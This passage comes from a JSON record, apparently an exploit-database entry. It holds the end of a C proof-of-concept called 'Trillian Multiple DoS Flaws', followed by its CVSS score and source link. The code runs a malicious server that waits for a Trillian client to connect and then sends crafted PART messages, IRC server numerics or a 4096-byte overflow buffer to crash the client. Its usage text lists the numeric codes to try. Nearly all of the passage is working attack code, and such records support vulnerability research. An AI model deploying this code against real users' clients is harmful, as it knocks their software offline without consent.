}\r\n\r\n\t\t while (TempSock == SOCKET_ERROR) {\r\n\t\t TempSock = accept(s, NULL, NULL);\r\n\t\t }\r\n\r\n\t\t printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n\r\n\t\t if (!strcmp(argv[1],\"part\")) {\r\n\t\t \t\t send(TempSock,PART,strlen(PART),0);\r\n\t\t }\r\n\t\t if (!strcmp(argv[1],\"raw\")) {\r\n\t\t \t\t send(TempSock,SERVER,strlen(SERVER),0);\r\n\t\t \t\t send(TempSock,argv[2],strlen(argv[2]),0);\r\n\t\t \t\t send(TempSock,\"\\n\",1,0);\r\n\t\t }\r\n\t\t if (!strcmp(argv[1],\"data\")) {\r\n\t\t \t\t memset(payload,'A',4096);\r\n\t\t \t\t send(TempSock,payload,strlen(payload),0);\r\n\t\t }\r\n\t\t printf(\"Exiting\\n\");\r\n\t\t sleep(100);\r\n\t\t WSACleanup();\r\n\t\t return 0;\r\n}\r\n\r\nusage() {\r\n\t\t \t\t printf(\"\\nTrillian Multiple DoS Flaws\\n\");\r\n\t\t \t\t printf(\"---------------------------\\n\");\r\n\t\t \t\t printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n\t\t \t\t printf(\"Tested On Version .74\\n\\n\");\r\n\t\t \t\t printf(\"Usage: Trillian-Dos <type> [num]\\n\");\r\n\t\t \t\t printf(\"Type: raw, part, data\\n\");\r\n\t\t \t\t printf(\"Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,\r\n333, 352, 367\\n\\n\");\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21823/"}]}